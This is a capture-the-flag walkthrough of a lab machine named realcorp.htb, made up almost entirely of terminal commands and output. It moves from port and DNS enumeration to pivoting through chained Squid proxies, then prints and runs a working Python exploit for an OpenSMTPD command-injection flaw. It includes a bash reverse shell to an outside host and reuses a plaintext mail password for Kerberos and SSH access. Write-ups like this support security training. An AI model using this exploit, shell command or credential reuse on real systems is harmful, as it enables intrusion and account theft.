sudo nmap -p- -T4 -A 10.10.10.224
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 8d:dd:18:10:e5:7b:b0:da:a3:fa:14:37:a7:52:7a:9c (RSA)
| 256 f6:a9:2e:57:f8:18:b6:f4:ee:03:41:27:1e:1f:93:99 (ECDSA)
|_ 256 04:74:dd:68:79:f4:22:78:d8:ce:dd:8b:3e:8c:76:3b (ED25519)
53/tcp open domain ISC BIND 9.11.20 (RedHat Enterprise Linux 8)
| dns-nsid:
|_ bind.version: 9.11.20-RedHat-9.11.20-5.el8
88/tcp open kerberos-sec MIT Kerberos (server time: 2021-05-12 16:47:12Z)
3128/tcp open http-proxy Squid http proxy 4.11
|_http-server-header: squid/4.11
|_http-title: ERROR: The requested URL could not be retrieved
9090/tcp closed zeus-admin
http://10.10.10.224:3128/
Your cache administrator is j.nakazawa@realcorp.htb.
Generated Sun, 06 Jun 2021 18:59:47 GMT by srv01.realcorp.htb (squid/4.11)
$ echo 10.10.10.224 realcorp.htb | sudo tee -a /etc/hosts
gobuster dns -d realcorp.htb -r 10.10.10.224:53 -i -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain: realcorp.htb
[+] Threads: 10
[+] Resolver: 10.10.10.224:53
[+] Show IPs: true
[+] Timeout: 1s
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
===============================================================
2021/06/06 19:17:45 Starting gobuster in DNS enumeration mode
===============================================================
Found: proxy.realcorp.htb [10.197.243.77]
Found: wpad.realcorp.htb [10.197.243.31]
===============================================================
2021/06/06 22:28:38 Finished
===============================================================
$ dnsenum --threads 64 --dnsserver 10.10.10.224 -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt realcorp.htb
ns.realcorp.htb. 259200 IN A 10.197.243.77
proxy.realcorp.htb. 259200 IN CNAME ns.realcorp.htb.
ns.realcorp.htb. 259200 IN A 10.197.243.77
wpad.realcorp.htb. 259200 IN A 10.197.243.31
$ cat /etc/proxychains4.conf
... ...
[ProxyList]
# add proxy here ...
# meanwhile
# Strict chain, in order: srv01's public Squid (10.10.10.224) -> the Squid on
# srv01's own loopback (the CONNECT to 127.0.0.1 is issued by that first hop,
# so it is srv01's loopback, not the attacker's) -> the Squid on
# proxy/ns.realcorp.htb (10.197.243.77), from which the 10.197.243.0/24 and
# 10.241.251.0/24 networks listed in wpad.dat are reachable.
# defaults set to "tor"
#socks4 127.0.0.1 9050
http 10.10.10.224 3128
http 127.0.0.1 3128
http 10.197.243.77 3128
$ proxychains -f /etc/proxychains4.conf nmap -sT -Pn -oN scans/proxy 10.197.243.31   # -sT -Pn: only full TCP connects traverse an HTTP proxy chain; SYN, ICMP and UDP probes never leave the attacker host
Nmap scan report for wpad.realcorp.htb (10.197.243.31)
Host is up (0.12s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
464/tcp open kpasswd5
749/tcp open kerberos-adm
3128/tcp open squid-http
Nmap done: 1 IP address (1 host up) scanned in 120.63 seconds
$ echo 10.197.243.31 wpad.realcorp.htb | sudo tee -a /etc/hosts
$ proxychains -f /etc/proxychains4.conf curl http://wpad.realcorp.htb/wpad.dat
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Strict chain ... 10.10.10.224:3128 ... 127.0.0.1:3128 ... 10.197.243.77:3128 ... 10.197.243.31:80 ... OK
function FindProxyForURL(url, host) {
if (dnsDomainIs(host, "realcorp.htb"))
return "DIRECT";
if (isInNet(dnsResolve(host), "10.197.243.0", "255.255.255.0"))
return "DIRECT";
if (isInNet(dnsResolve(host), "10.241.251.0", "255.255.255.0"))
return "DIRECT";
return "PROXY proxy.realcorp.htb:3128";
}
$ proxychains -f /etc/proxychains4.conf nmap -sT -sV -Pn 10.241.251.113
Nmap scan report for 10.241.251.113
Host is up (0.12s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp OpenSMTPD
Service Info: Host: smtp.realcorp.htb
CVE-2020-7247 (OpenSMTPD: a crafted MAIL FROM address reaches the local delivery shell unescaped, giving command execution as the daemon's user; nmap printed no version for port 25, so confirm the target is a vulnerable build rather than assuming the PoC applies): https://blog.firosolutions.com/exploits/opensmtpd-remote-vulnerability/
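#!/usr/bin/env python3
"""PoC for CVE-2020-7247: command execution through OpenSMTPD's MAIL FROM
address validation (authorised testing only).

Usage: getshell.py <host> <port> <command> [<recipient>]

The crafted envelope sender is handed to the local delivery agent unescaped.
The injected fragment makes the spawned shell discard the first 14 lines it
is fed and run the remainder of the message with `sh`, so the message body
is a run of harmless '#' comment lines followed by <command>.  <recipient>
must be an address the server accepts for local delivery (default:
j.nakazawa@realcorp.htb, which the target acknowledged in the original run).
Nothing here checks the daemon version; confirm the target is a vulnerable
OpenSMTPD build before relying on the result.
"""
import socket
import sys

# Envelope sender carrying the injected shell fragment (see module doc).
MAIL_FROM = b"MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>\r\n"
DEFAULT_RCPT = "j.nakazawa@realcorp.htb"
TIMEOUT = 10  # seconds per socket operation; the proxy chain in front of the target is slow


def build_payload(command: str) -> bytes:
    """Return the DATA section for `command`, ending with the SMTP end-of-data marker.

    The layout (a blank line, then '#0'..'#d', each followed by an extra LF)
    is kept byte-identical to the published PoC: the '#' lines are shell
    comments, so however many of them survive the 14-line skip in MAIL_FROM
    they execute as no-ops before `command` does.
    """
    filler = b"\r\n\n" + b"".join(b"#" + c.encode() + b"\r\n\n" for c in "0123456789abcd")
    return filler + command.encode() + b"\n.\n"


def read_reply(sock: socket.socket, expect: str) -> str:
    """Read one SMTP reply, print it, and abort unless it starts with `expect`.

    A rejected MAIL FROM (5xx instead of 250) means the server is not
    vulnerable or the address was filtered; continuing would only send the
    payload to a host that will never execute it.
    """
    reply = sock.recv(4096).decode(errors="replace")
    print("Received", repr(reply))
    if not reply.startswith(expect):
        sys.exit(f"unexpected reply (wanted {expect}): {reply.strip()}")
    return reply


def main(argv: list[str]) -> int:
    """Drive the SMTP session; returns the process exit status."""
    if len(argv) < 4:
        print("usage: getshell.py <host> <port> <command> [<recipient>]")
        return 2
    host, port, command = argv[1], int(argv[2]), argv[3]
    rcpt = argv[4] if len(argv) > 4 else DEFAULT_RCPT

    # create_connection tries every address family, like the original loop.
    try:
        sock = socket.create_connection((host, port), timeout=TIMEOUT)
    except OSError as exc:
        print(f"Could not open socket: {exc}")
        return 1

    # sendall() rather than send(): a short write would corrupt the session.
    with sock:
        read_reply(sock, "220")
        print("SENDING HELO")
        sock.sendall(b"helo test.com\r\n")
        read_reply(sock, "250")
        sock.sendall(MAIL_FROM)
        read_reply(sock, "250")
        sock.sendall(b"RCPT TO:<" + rcpt.encode() + b">\r\n")
        read_reply(sock, "250")
        sock.sendall(b"DATA\r\n")
        read_reply(sock, "354")
        sock.sendall(build_payload(command))
        read_reply(sock, "250")
        sock.sendall(b"QUIT\r\n")
        read_reply(sock, "221")
    print("Exploited")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))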
$ nc -lvnp 4444
$ proxychains -f /etc/proxychains4.conf python3 exploit.py 10.241.251.113 25 'bash -c "exec bash -i &> /dev/tcp/10.10.14.42/4444 <&1"'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Strict chain ... 10.10.10.224:3128 ... 127.0.0.1:3128 ... 10.197.243.77:3128 ... 10.241.251.113:25 ... OK
Received b'220 smtp.realcorp.htb ESMTP OpenSMTPD\r\n'
SENDING HELO
RECIEVED b'250 smtp.realcorp.htb Hello test.com [10.241.251.1], pleased to meet you\r\n'
RECIEVED b'250 2.0.0 Ok\r\n'
RECIEVED b'250 2.1.5 Destination address valid: Recipient ok\r\n'
RECIEVED b'354 Enter mail, end with "." on a line by itself\r\n'
RECIEVED b'250 2.0.0 cfac7b55 Message accepted for delivery\r\n'
RECIEVED b'221 2.0.0 Bye\r\n'
Exploited
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.42] from (UNKNOWN) [10.10.10.224] 55636
bash: cannot set terminal process group (77): Inappropriate ioctl for device
bash: no job control in this shell
root@smtp:~#
root@smtp:/home/j.nakazawa# cat .msmtprc
cat .msmtprc
# Set default values for all following accounts.
defaults
auth on
tls on
tls_trust_file /etc/ssl/certs/ca-certificates.crt
logfile /dev/null
# RealCorp Mail (the plaintext submission password stored below is the same
# credential reused for j.nakazawa's Kerberos login in the next step)
account realcorp
host 127.0.0.1
port 587
from j.nakazawa@realcorp.htb
user j.nakazawa
password sJB}RM>6Z~64_
tls_fingerprint C9:6A:B9:F6:0A:D4:9C:2B:B9:F6:44:1F:30:B8:5E:5A:D8:0D:A5:60
# Set a default account
account default : realcorp
$ sudo apt install krb5-user
$ echo 10.10.10.224 srv01.realcorp.htb | sudo tee -a /etc/hosts
Also comment out the earlier `10.10.10.224 realcorp.htb` entry in /etc/hosts, so the KDC's address maps to its real hostname srv01.realcorp.htb (the name /etc/krb5.conf below maps into the REALCORP.HTB realm) rather than the bare domain.
$ sudo vi /etc/krb5.conf
/etc/krb5.conf
[libdefaults]
default_realm = REALCORP.HTB
[realms]
REALCORP.HTB = {
kdc = 10.10.10.224
}
[domain_realm]
srv01.realcorp.htb = REALCORP.HTB
$ kinit j.nakazawa
Password for j.nakazawa@REALCORP.HTB:
$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: j.nakazawa@REALCORP.HTB
Valid starting Expires Service principal
06/17/2021 10:27:22 06/18/2021 10:15:31 krbtgt/REALCORP.HTB@REALCORP.HTB
/etc/ssh/sshd_config
KerberosAuthentication yes
KerberosOrLocalPasswd [yes|no]
KerberosTicketCleanup yes
$ ssh j.nakazawa@10.10.10.224
Activate the web console with: systemctl enable --now cockpit.socket
Last failed login: Thu Jun 17 20:20:01 BST 2021 from 10.10.14.42 on ssh:notty
There were 11 failed login attempts since the last successful login.
Last login: Thu Jun 17 11:51:58 2021 from 10.10.14.73
[j.nakazawa@srv01 ~]$ cat user.txt
4f9570270b373359fdbf61c1a4312f04
[j.nakazawa@srv01 ~]$